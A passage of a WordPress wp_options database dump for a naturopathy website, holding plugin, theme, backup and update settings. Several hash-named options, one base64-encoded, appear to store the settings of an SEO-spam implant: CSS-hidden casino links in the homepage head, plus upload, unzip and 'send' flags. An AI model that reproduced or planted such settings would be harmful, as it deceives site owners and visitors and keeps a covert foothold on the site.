table\";s:9:\"timestamp\";s:19:\"2026-02-06 02:02:16\";}}','off'),(180190,'monsterinsights_migration_history','a:1:{i:0;a:5:{s:7:\"version\";s:17:\"1.0.0-cache-table\";s:6:\"status\";s:6:\"failed\";s:8:\"duration\";d:0.0065639019012451171875;s:5:\"error\";s:28:\"Failed to create cache table\";s:9:\"timestamp\";s:19:\"2026-02-06 02:02:16\";}}','off'),(180192,'monsterinsights_feedback_tracked_features','a:0:{}','auto'),(161627,'_site_transient_wp_plugin_dependencies_plugin_data','a:0:{}','off'),(161640,'duplicator_version_plugin','1.5.14','auto'),(161642,'duplicator_install_info','a:3:{s:7:\"version\";s:6:\"1.5.14\";s:4:\"time\";i:1761124682;s:10:\"updateTime\";i:1761124682;}','off'),(161643,'duplicator_uninstall_package','1','auto'),(161644,'duplicator_uninstall_settings','1','auto'),(161645,'duplicator_settings','a:20:{s:7:\"version\";s:6:\"1.5.14\";s:18:\"uninstall_settings\";b:1;s:15:\"uninstall_files\";b:1;s:13:\"package_debug\";b:0;s:23:\"email_summary_frequency\";s:6:\"weekly\";s:9:\"amNotices\";b:1;s:17:\"package_mysqldump\";b:1;s:22:\"package_mysqldump_path\";s:0:\"\";s:24:\"package_phpdump_qrylimit\";s:3:\"100\";s:17:\"package_zip_flush\";b:0;s:19:\"installer_name_mode\";s:6:\"simple\";s:16:\"storage_position\";s:6:\"wpcont\";s:20:\"storage_htaccess_off\";b:0;s:18:\"archive_build_mode\";i:2;s:17:\"skip_archive_scan\";b:0;s:21:\"unhook_third_party_js\";b:0;s:22:\"unhook_third_party_css\";b:0;s:17:\"active_package_id\";i:1;s:14:\"usage_tracking\";b:0;i:0;b:0;}','auto'),(161646,'duplicator_plugin_data_stats','{\n \"lastSendTime\": 0,\n \"identifier\": \"vmfwbPihOIYZ6Baq-eTL,JOBCMhQ69eY&643CIrULoZl\",\n \"plugin\": \"dup-lite\",\n \"pluginStatus\": \"active\",\n \"buildCount\": 1,\n \"buildLastDate\": 1761124809,\n \"buildFailedCount\": 0,\n \"buildFailedLastDate\": 0,\n \"siteSizeMB\": 267.779999999999972715158946812152862548828125,\n \"siteNumFiles\": 10077,\n \"siteDbSizeMB\": 5.79999999999999982236431605997495353221893310546875,\n \"siteDbNumTables\": 22\n}','auto'),(161651,'duplicator_notifications','a:4:{s:6:\"update\";i:1787226449;s:4:\"feed\";a:0:{}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','auto'),(161653,'duplicator_package_active','O:11:\"DUP_Package\":23:{s:7:\"Created\";s:19:\"2025-10-22 09:19:12\";s:7:\"Version\";s:6:\"1.5.14\";s:9:\"VersionWP\";s:5:\"6.8.3\";s:9:\"VersionDB\";s:6:\"8.0.43\";s:10:\"VersionPHP\";s:6:\"7.4.33\";s:9:\"VersionOS\";s:5:\"Linux\";s:2:\"ID\";N;s:4:\"Name\";s:25:\"20251022_verdenaturopathy\";s:4:\"Hash\";s:35:\"cb514b58d35557195673_20251022091912\";s:8:\"NameHash\";s:61:\"20251022_verdenaturopathy_cb514b58d35557195673_20251022091912\";s:4:\"Type\";i:0;s:5:\"Notes\";s:0:\"\";s:8:\"ScanFile\";s:71:\"20251022_verdenaturopathy_cb514b58d35557195673_20251022091912_scan.json\";s:10:\"TimerStart\";i:-1;s:7:\"Runtime\";N;s:7:\"ExeSize\";N;s:7:\"ZipSize\";N;s:6:\"Status\";i:0;s:6:\"WPUser\";N;s:7:\"Archive\";O:11:\"DUP_Archive\":26:{s:10:\"FilterDirs\";s:0:\"\";s:11:\"FilterFiles\";s:0:\"\";s:10:\"FilterExts\";s:0:\"\";s:13:\"FilterDirsAll\";a:0:{}s:14:\"FilterFilesAll\";a:0:{}s:13:\"FilterExtsAll\";a:0:{}s:8:\"FilterOn\";i:0;s:12:\"ExportOnlyDB\";i:0;s:4:\"File\";N;s:6:\"Format\";s:3:\"ZIP\";s:7:\"PackDir\";s:38:\"/home/desid573/verdenaturopathy.com.au\";s:4:\"Size\";i:0;s:4:\"Dirs\";a:0:{}s:9:\"dirsCount\";i:1366;s:5:\"Files\";a:0:{}s:10:\"filesCount\";i:8711;s:10:\"FilterInfo\";O:23:\"DUP_Archive_Filter_Info\":8:{s:4:\"Dirs\";O:34:\"DUP_Archive_Filter_Scope_Directory\":6:{s:7:\"Warning\";a:0:{}s:10:\"Unreadable\";a:0:{}s:10:\"AddonSites\";a:0:{}s:4:\"Core\";a:0:{}s:6:\"Global\";a:0:{}s:8:\"Instance\";a:0:{}}s:5:\"Files\";O:29:\"DUP_Archive_Filter_Scope_File\":7:{s:4:\"Size\";a:0:{}s:7:\"Warning\";a:0:{}s:10:\"Unreadable\";a:0:{}s:10:\"AddonSites\";a:0:{}s:4:\"Core\";a:0:{}s:6:\"Global\";a:0:{}s:8:\"Instance\";a:0:{}}s:4:\"Exts\";O:29:\"DUP_Archive_Filter_Scope_Base\":3:{s:4:\"Core\";a:0:{}s:6:\"Global\";a:0:{}s:8:\"Instance\";a:0:{}}s:9:\"UDirCount\";i:0;s:10:\"UFileCount\";i:0;s:9:\"UExtCount\";i:0;s:8:\"TreeSize\";a:0:{}s:11:\"TreeWarning\";a:0:{}}s:14:\"RecursiveLinks\";a:0:{}s:10:\"file_count\";i:-1;s:10:\"\0*\0Package\";O:11:\"DUP_Package\":23:{s:7:\"Created\";s:19:\"2025-10-22 09:19:12\";s:7:\"Version\";s:6:\"1.5.14\";s:9:\"VersionWP\";s:5:\"6.8.3\";s:9:\"VersionDB\";s:6:\"8.0.43\";s:10:\"VersionPHP\";s:6:\"7.4.33\";s:9:\"VersionOS\";s:5:\"Linux\";s:2:\"ID\";N;s:4:\"Name\";s:25:\"20251022_verdenaturopathy\";s:4:\"Hash\";s:35:\"cb514b58d35557195673_20251022091912\";s:8:\"NameHash\";s:61:\"20251022_verdenaturopathy_cb514b58d35557195673_20251022091912\";s:4:\"Type\";i:0;s:5:\"Notes\";s:0:\"\";s:8:\"ScanFile\";N;s:10:\"TimerStart\";i:-1;s:7:\"Runtime\";N;s:7:\"ExeSize\";N;s:7:\"ZipSize\";N;s:6:\"Status\";i:0;s:6:\"WPUser\";N;s:7:\"Archive\";r:21;s:9:\"Installer\";O:13:\"DUP_Installer\":15:{s:4:\"File\";N;s:4:\"Size\";i:0;s:10:\"OptsDBHost\";s:0:\"\";s:10:\"OptsDBPort\";s:0:\"\";s:10:\"OptsDBName\";s:0:\"\";s:10:\"OptsDBUser\";s:0:\"\";s:13:\"OptsDBCharset\";s:0:\"\";s:15:\"OptsDBCollation\";s:0:\"\";s:12:\"OptsSecureOn\";i:0;s:14:\"OptsSecurePass\";s:0:\"\";s:13:\"numFilesAdded\";i:0;s:12:\"numDirsAdded\";i:0;s:10:\"\0*\0Package\";r:65;s:17:\"\0*\0origFileManger\";N;s:32:\"\0DUP_Installer\0configTransformer\";O:44:\"Duplicator\\Libs\\WpConfig\\WPConfigTransformer\":3:{s:17:\"\0*\0wp_config_path\";s:52:\"/home/desid573/verdenaturopathy.com.au/wp-config.php\";s:16:\"\0*\0wp_config_src\";N;s:13:\"\0*\0wp_configs\";a:0:{}}}s:8:\"Database\";O:12:\"DUP_Database\":15:{s:4:\"Type\";s:5:\"MySQL\";s:4:\"Size\";N;s:4:\"File\";N;s:4:\"Path\";N;s:12:\"FilterTables\";s:0:\"\";s:8:\"FilterOn\";i:0;s:4:\"Name\";N;s:10:\"Compatible\";s:0:\"\";s:8:\"Comments\";s:28:\"MySQL Community Server - GPL\";s:19:\"sameNameTableExists\";N;s:4:\"info\";O:16:\"DUP_DatabaseInfo\":23:{s:9:\"buildMode\";s:3:\"PHP\";s:11:\"charSetList\";a:0:{}s:13:\"collationList\";a:0:{}s:10:\"engineList\";a:0:{}s:17:\"isTablesUpperCase\";b:0;s:15:\"isNameUpperCase\";b:0;s:4:\"name\";s:0:\"\";s:15:\"tablesBaseCount\";i:0;s:16:\"tablesFinalCount\";i:0;s:20:\"muFilteredTableCount\";i:0;s:14:\"tablesRowCount\";i:0;s:16:\"tablesSizeOnDisk\";i:0;s:10:\"tablesList\";a:0:{}s:19:\"lowerCaseTableNames\";i:0;s:8:\"dbEngine\";s:0:\"\";s:7:\"version\";i:0;s:14:\"versionComment\";i:0;s:9:\"viewCount\";i:0;s:9:\"procCount\";i:0;s:9:\"funcCount\";i:0;s:11:\"triggerList\";a:0:{}s:33:\"\0DUP_DatabaseInfo\0intFieldsStruct\";a:0:{}s:42:\"\0DUP_DatabaseInfo\0indexProcessedSchemaSize\";a:0:{}}s:10:\"\0*\0Package\";r:65;s:24:\"\0DUP_Database\0tempDbPath\";N;s:23:\"\0DUP_Database\0EOFMarker\";s:0:\"\";s:26:\"\0DUP_Database\0networkFlush\";b:0;}s:13:\"BuildProgress\";O:18:\"DUP_Build_Progress\":12:{s:17:\"thread_start_time\";N;s:11:\"initialized\";b:0;s:15:\"installer_built\";b:0;s:15:\"archive_started\";b:0;s:20:\"archive_has_database\";b:0;s:13:\"archive_built\";b:0;s:21:\"database_script_built\";b:0;s:6:\"failed\";b:0;s:7:\"retries\";i:0;s:14:\"build_failures\";a:0:{}s:19:\"validation_failures\";a:0:{}s:27:\"\0DUP_Build_Progress\0package\";r:65;}}s:29:\"\0DUP_Archive\0tmpFilterDirsAll\";a:0:{}s:24:\"\0DUP_Archive\0wpCorePaths\";a:3:{i:0;s:47:\"/home/desid573/verdenaturopathy.com.au/wp-admin\";i:1;s:50:\"/home/desid573/verdenaturopathy.com.au/wp-includes\";i:2;s:59:\"/home/desid573/verdenaturopathy.com.au/wp-content/languages\";}s:29:\"\0DUP_Archive\0wpCoreExactPaths\";a:7:{i:0;s:38:\"/home/desid573/verdenaturopathy.com.au\";i:1;s:38:\"/home/desid573/verdenaturopathy.com.au\";i:2;s:49:\"/home/desid573/verdenaturopathy.com.au/wp-content\";i:3;s:57:\"/home/desid573/verdenaturopathy.com.au/wp-content/uploads\";i:4;s:57:\"/home/desid573/verdenaturopathy.com.au/wp-content/plugins\";i:5;s:60:\"/home/desid573/verdenaturopathy.com.au/wp-content/mu-plugins\";i:6;s:56:\"/home/desid573/verdenaturopathy.com.au/wp-content/themes\";}s:31:\"\0DUP_Archive\0relativeFiltersDir\";a:2:{i:0;s:70:\"/home/desid573/verdenaturopathy.com.au/wp-content/backups-dup-lite/tmp\";i:1;s:15:\"backups-dup-pro\";}s:24:\"\0DUP_Archive\0listFileObj\";N;s:23:\"\0DUP_Archive\0listDirObj\";N;}s:9:\"Installer\";r:86;s:8:\"Database\";r:105;s:13:\"BuildProgress\";r:144;}','auto'),(161655,'duplicator_email_summary_info','{\"CL_-=_-=\":\"Duplicator\\\\Utils\\\\Email\\\\EmailSummary\",\"manualPackageIds\":[],\"failedPackageIds\":[]}','auto'),(168777,'wp_notes_notify','1','on'),(199225,'duplicator_dismissed_admin_notices','a:1:{s:14:\"review_request\";a:1:{s:4:\"time\";i:1779677458;}}','on'),(198530,'9371d77a1d9411f3cd7260e759d4cb32','YToyOntpOjU3MDA7YToxOntzOjk6ImhvbWVMaW5rcyI7Tjt9aTozMjExO2E6NDp7czoyOiJqcyI7czowOiIiO3M6MTU6InNpdGVtYXBzZXR0aW5ncyI7YToxOntzOjE0OiJzaXRlbWFwMlwueG1sJCI7czoyNjoiaW5kZXgucGhwP2ZlZWQ9eG1sc2l0ZW1hcDIiO31zOjQ6Im5vanMiO2k6MDtzOjk6ImhvbWVMaW5rcyI7YTo1OntzOjEwOiJoaWRkZW5UeXBlIjthOjE6e3M6MzoiY3NzIjtpOjE7fXM6ODoicG9zaXRpb24iO2E6MTp7czo0OiJoZWFkIjtpOjE7fXM6ODoibGFuZ3VhZ2UiO3M6MjoiRU4iO3M6NDoidHlwZSI7czo2OiJDQVNJTk8iO3M6MTU6InRleHRCbG9ja3NDb3VudCI7YToxOntzOjEyOiJvbmx5SG9tZVBhZ2UiO2k6MTt9fX19','yes'),(198531,'plugins_backup_3211_3df6d87510959d52fee96e68a0b54626','{\"hide\":0,\"upload\":0,\"unzip\":0,\"import\":0,\"send\":0,\"clean\":0,\"sitemap\":0}','yes'),(214502,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-7.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-7.1.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-7.1-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-7.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:3:\"7.1\";s:7:\"version\";s:3:\"7.1\";s:11:\"php_version\";s:3:\"7.4\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1787378677;s:15:\"version_checked\";s:3:\"7.1\";s:12:\"translations\";a:0:{}}','off'),(199296,'et_divi_builder_workspaces','a:3:{s:7:\"builtIn\";a:1:{s:9:\"last-used\";a:11:{s:2:\"id\";s:8:\"last-use\";s:5:\"label\";s:9:\"Last Used\";s:6:\"window\";a:2:{s:3:\"top\";a:2:{s:5:\"width\";i:1440;s:6:\"height\";i:788;}s:3:\"app\";a:2:{s:5:\"width\";i:1100;s:6:\"height\";i:740;}}s:21:\"appFramePseudoWrapper\";a:5:{s:9:\"marginTop\";i:48;s:11:\"marginRight\";i:280;s:10:\"marginLeft\";i:48;s:5:\"width\";i:1112;s:6:\"height\";i:740;}s:8:\"elements\";a:10:{s:8:\"adminBar\";a:3:{s:7:\"visible\";b:0;s:9:\"dimension\";a:1:{s:6:\"height\";i:0;}s:6:\"offset\";a:2:{s:3:\"top\";i:0;s:4:\"left\";i:0;}}s:18:\"brandedModalHeader\";a:3:{s:7:\"visible\";b:0;s:9:\"dimension\";a:1:{s:6:\"height\";i:32;}s:6:\"offset\";a:1:{s:4:\"left\";i:0;}}s:11:\"diviTopMenu\";a:3:{s:7:\"visible\";b:1;s:9:\"dimension\";a:1:{s:6:\"height\";i:98;}s:6:\"offset\";a:1:{s:4:\"left\";i:0;}}s:7:\"pageBar\";a:3:{s:7:\"visible\";b:1;s:9:\"dimension\";a:1:{s:6:\"height\";i:48;}s:6:\"offset\";a:1:{s:4:\"left\";i:0;}}s:10:\"builderBar\";a:3:{s:7:\"visible\";b:1;s:9:\"dimension\";a:1:{s:5:\"width\";i:48;}s:6:\"offset\";a:1:{s:4:\"left\";i:0;}}s:17:\"builderBarButtons\";a:0:{}s:11:\"sidebarLeft\";a:3:{s:7:\"visible\";b:0;s:9:\"dimension\";a:1:{s:5:\"width\";i:200;}s:5:\"props\";a:3:{s:12:\"activeModals\";a:0:{}s:6:\"rowIds\";a:0:{}s:12:\"minimumWidth\";i:0;}}s:7:\"appArea\";a:1:{s:7:\"visible\";b:1;}s:8:\"appFrame\";a:3:{s:7:\"visible\";b:1;s:9:\"dimension\";a:2:{s:5:\"width\";i:0;s:6:\"height\";i:0;}s:5:\"props\";a:3:{s:12:\"minimumWidth\";i:300;s:4:\"zoom\";a:2:{s:5:\"value\";i:100;s:6:\"setter\";s:13:\"visualBuilder\";}s:6:\"resize\";a:3:{s:6:\"status\";b:0;s:17:\"triggeringElement\";b:0;s:8:\"position\";b:0;}}}s:12:\"sidebarRight\";a:4:{s:7:\"visible\";b:1;s:9:\"dimension\";a:1:{s:5:\"width\";i:280;}s:6:\"offset\";a:1:{s:5:\"right\";i:0;}s:5:\"props\";a:3:{s:12:\"activeModals\";a:0:{}s:6:\"rowIds\";a:1:{i:0;s:5:\"row-1\";}s:12:\"minimumWidth\";i:280;}}}s:11:\"sidebarRows\";a:1:{s:5:\"row-1\";a:4:{s:2:\"id\";s:5:\"row-1\";s:8:\"modalIds\";a:1:{i:0;s:18:\"divi/page-settings\";}s:11:\"activeModal\";s:18:\"divi/page-settings\";s:10:\"multiModal\";b:0;}}s:4:\"view\";s:7:\"desktop\";s:10:\"breakpoint\";s:7:\"desktop\";s:14:\"attributeState\";s:5:\"value\";s:17:\"interactionLayers\";a:7:{s:5:\"basic\";b:1;s:22:\"parentHighlightOnHover\";b:0;s:16:\"addModuleOnHover\";b:1;s:22:\"parentAddModuleOnHover\";b:1;s:13:\"actionOnHover\";b:1;s:19:\"parentActionOnHover\";b:1;s:4:\"xRay\";b:0;}s:20:\"activeFloatingModals\";a:0:{}}}s:6:\"custom\";a:0:{}s:5:\"cloud\";a:0:{}}','auto'),(213998,'_transient_timeout_rsssl_plusone_count','1787553630','off'),(213999,'_transient_rsssl_plusone_count','1','off'),(214002,'_site_transient_timeout_browser_6967ec7261b3cbe6a91d798c6b951c60','1787553630','off'),(214003,'_site_transient_browser_6967ec7261b3cbe6a91d798c6b951c60','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:9:\"151.0.0.0\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','off'),(214040,'e314056cffa6a81d799698a49a6dcdbc','3567a2f87e89e93d47e5357036e2332f','yes'),(214041,'plugins_backup_5700_1122548a828799e9fc78a1ee730424b0','{\"hide\":0,\"upload\":0,\"unzip\":0,\"import\":0,\"sidewideLinks\":0,\"clean\":0,\"homeLinks\":0}','yes'),(214811,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1787400327;s:7:\"checked\";a:12:{s:4:\"Divi\";s:5:\"5.6.0\";s:8:\"Divi_old\";s:5:\"4.9.4\";s:13:\"blossom-coach\";s:5:\"1.5.9\";s:20:\"blossom-health-coach\";s:5:\"1.1.2\";s:9:\"clearwork\";s:5:\"1.1.3\";s:11:\"polite-blog\";s:5:\"1.0.1\";s:6:\"polite\";s:5:\"1.3.5\";s:8:\"spa-lite\";s:3:\"1.9\";s:16:\"twentytwentyfive\";s:3:\"1.0\";s:16:\"twentytwentyfour\";s:3:\"1.0\";s:17:\"twentytwentythree\";s:3:\"1.0\";s:15:\"twentytwentytwo\";s:3:\"1.0\";}s:8:\"response\";a:7:{s:20:\"blossom-health-coach\";a:6:{s:5:\"theme\";s:20:\"blossom-health-coach\";s:11:\"new_version\";s:5:\"1.1.3\";s:3:\"url\";s:50:\"https://wordpress.org/themes/blossom-health-coach/\";s:7:\"package\";s:68:\"https://downloads.wordpress.org/theme/blossom-health-coach.1.1.3.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"7.4\";}s:6:\"polite\";a:6:{s:5:\"theme\";s:6:\"polite\";s:11:\"new_version\";s:5:\"1.4.0\";s:3:\"url\";s:36:\"https://wordpress.org/themes/polite/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/polite.1.4.0.zip\";s:8:\"requires\";s:3:\"6.0\";s:12:\"requires_php\";s:3:\"7.4\";}s:8:\"spa-lite\";a:6:{s:5:\"theme\";s:8:\"spa-lite\";s:11:\"new_version\";s:3:\"2.1\";s:3:\"url\";s:38:\"https://wordpress.org/themes/spa-lite/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/spa-lite.2.1.zip\";s:8:\"requires\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.6\";}s:16:\"twentytwentyfive\";a:6:{s:5:\"theme\";s:16:\"twentytwentyfive\";s:11:\"new_version\";s:3:\"1.5\";s:3:\"url\";s:46:\"https://wordpress.org/themes/twentytwentyfive/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/twentytwentyfive.1.5.zip\";s:8:\"requires\";s:3:\"6.7\";s:12:\"requires_php\";s:3:\"7.2\";}s:16:\"twentytwentyfour\";a:6:{s:5:\"theme\";s:16:\"twentytwentyfour\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:46:\"https://wordpress.org/themes/twentytwentyfour/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/twentytwentyfour.1.6.zip\";s:8:\"requires\";s:3:\"6.4\";s:12:\"requires_php\";s:3:\"7.0\";}s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.7\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.7.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"2.2\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.2.2.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:3:{s:13:\"blossom-coach\";a:6:{s:5:\"theme\";s:13:\"blossom-coach\";s:11:\"new_version\";s:5:\"1.5.9\";s:3:\"url\";s:43:\"https://wordpress.org/themes/blossom-coach/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/blossom-coach.1.5.9.zip\";s:8:\"requires\";s:3:\"6.2\";s:12:\"requires_php\";s:3:\"7.4\";}s:9:\"clearwork\";a:6:{s:5:\"theme\";s:9:\"clearwork\";s:11:\"new_version\";s:5:\"1.1.3\";s:3:\"url\";s:39:\"https://wordpress.org/themes/clearwork/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/clearwork.1.1.3.zip\";s:8:\"requires\";s:3:\"5.0\";s:12:\"requires_php\";s:3:\"5.6\";}s:11:\"polite-blog\";a:6:{s:5:\"theme\";s:11:\"polite-blog\";s:11:\"new_version\";s:5:\"1.0.1\";s:3:\"url\";s:41:\"https://wordpress.org/themes/polite-blog/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/polite-blog.1.0.1.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.2\";}}s:12:\"translations\";a:0:{}}','off'),(214870,'_site_transient_timeout_wp_theme_files_patterns-8c7fde9e9309491083fb5016c4b73002','1787414725','off'),(214871,'_site_transient_wp_theme_files_patterns-8c7fde9e9309491083fb5016c4b73002','a:2:{s:7:\"version\";s:5:\"5.6.0\";s:8:\"patterns\";a:0:{}}','off'),(214812,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1787400327;s:8:\"response\";a:11:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"5.7.2\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.5.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=2818463\";s:2:\"1x\";s:60:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=2818463\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/akismet/assets/banner-1544x500.png?rev=2900731\";s:2:\"1x\";s:62:\"https://ps.w.org/akismet/assets/banner-772x250.png?rev=2900731\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.8\";s:6:\"tested\";s:3:\"7.1\";s:12:\"requires_php\";s:3:\"7.2\";s:16:\"requires_plugins\";a:0:{}}s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";O:8:\"stdClass\":14:{s:2:\"id\";s:33:\"w.org/plugins/all-in-one-seo-pack\";s:4:\"slug\";s:19:\"all-in-one-seo-pack\";s:6:\"plugin\";s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";s:11:\"new_version\";s:7:\"5.0.0.1\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/all-in-one-seo-pack/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/all-in-one-seo-pack.5.0.0.1.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:64:\"https://ps.w.org/all-in-one-seo-pack/assets/icon.svg?rev=2443290\";s:3:\"svg\";s:64:\"https://ps.w.org/all-in-one-seo-pack/assets/icon.svg?rev=2443290\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:75:\"https://ps.w.org/all-in-one-seo-pack/assets/banner-1544x500.png?rev=3310686\";s:2:\"1x\";s:74:\"https://ps.w.org/all-in-one-seo-pack/assets/banner-772x250.png?rev=3310686\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.7\";s:6:\"tested\";s:5:\"7.0.4\";s:12:\"requires_php\";s:3:\"7.2\";s:16:\"requires_plugins\";a:0:{}s:14:\"upgrade_notice\";s:57:\"<p>This update adds major improvements and bug fixes.</p>\";}s:33:\"alx-extensions/alx-extensions.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:28:\"w.org/plugins/alx-extensions\";s:4:\"slug\";s:14:\"alx-extensions\";s:6:\"plugin\";s:33:\"alx-extensions/alx-extensions.php\";s:11:\"new_version\";s:5:\"1.1.5\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/alx-extensions/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/alx-extensions.1.1.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/alx-extensions/assets/icon-256x256.png?rev=3267027\";s:2:\"1x\";s:67:\"https://ps.w.org/alx-extensions/assets/icon-128x128.png?rev=3267027\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/alx-extensions/assets/banner-1544x500.png?rev=3267027\";s:2:\"1x\";s:69:\"https://ps.w.org/alx-extensions/assets/banner-772x250.png?rev=3267027\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";s:6:\"tested\";s:5:\"6.7.7\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:0:{}}s:25:\"duplicator/duplicator.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:24:\"w.org/plugins/duplicator\";s:4:\"slug\";s:10:\"duplicator\";s:6:\"plugin\";s:25:\"duplicator/duplicator.php\";s:11:\"new_version\";s:8:\"1.5.16.1\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/duplicator/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/duplicator.1.5.16.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/duplicator/assets/icon-256x256.png?rev=2906985\";s:2:\"1x\";s:63:\"https://ps.w.org/duplicator/assets/icon-128x128.png?rev=2906985\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/duplicator/assets/banner-1544x500.png?rev=2906985\";s:2:\"1x\";s:65:\"https://ps.w.org/duplicator/assets/banner-772x250.png?rev=2906985\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.3\";s:6:\"tested\";s:5:\"7.0.4\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:50:\"google-analytics-for-wordpress/googleanalytics.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:44:\"w.org/plugins/google-analytics-for-wordpress\";s:4:\"slug\";s:30:\"google-analytics-for-wordpress\";s:6:\"plugin\";s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:11:\"new_version\";s:6:\"11.1.3\";s:3:\"url\";s:61:\"https://wordpress.org/plugins/google-analytics-for-wordpress/\";s:7:\"package\";s:80:\"https://downloads.wordpress.org/plugin/google-analytics-for-wordpress.11.1.3.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:75:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon.svg?rev=2976619\";s:3:\"svg\";s:75:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon.svg?rev=2976619\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:86:\"https://ps.w.org/google-analytics-for-wordpress/assets/banner-1544x500.png?rev=2159532\";s:2:\"1x\";s:85:\"https://ps.w.org/google-analytics-for-wordpress/assets/banner-772x250.png?rev=2159532\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"5.6.0\";s:6:\"tested\";s:3:\"7.1\";s:12:\"requires_php\";s:3:\"7.2\";s:16:\"requires_plugins\";a:0:{}}s:21:\"meta-box/meta-box.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:22:\"w.org/plugins/meta-box\";s:4:\"slug\";s:8:\"meta-box\";s:6:\"plugin\";s:21:\"meta-box/meta-box.php\";s:11:\"new_version\";s:6:\"5.14.1\";s:3:\"url\";s:39:\"https://wordpress.org/plugins/meta-box/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/meta-box.5.14.1.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/meta-box/assets/icon-128x128.png?rev=1100915\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/meta-box/assets/banner-1544x500.png?rev=3364259\";s:2:\"1x\";s:63:\"https://ps.w.org/meta-box/assets/banner-772x250.png?rev=3364259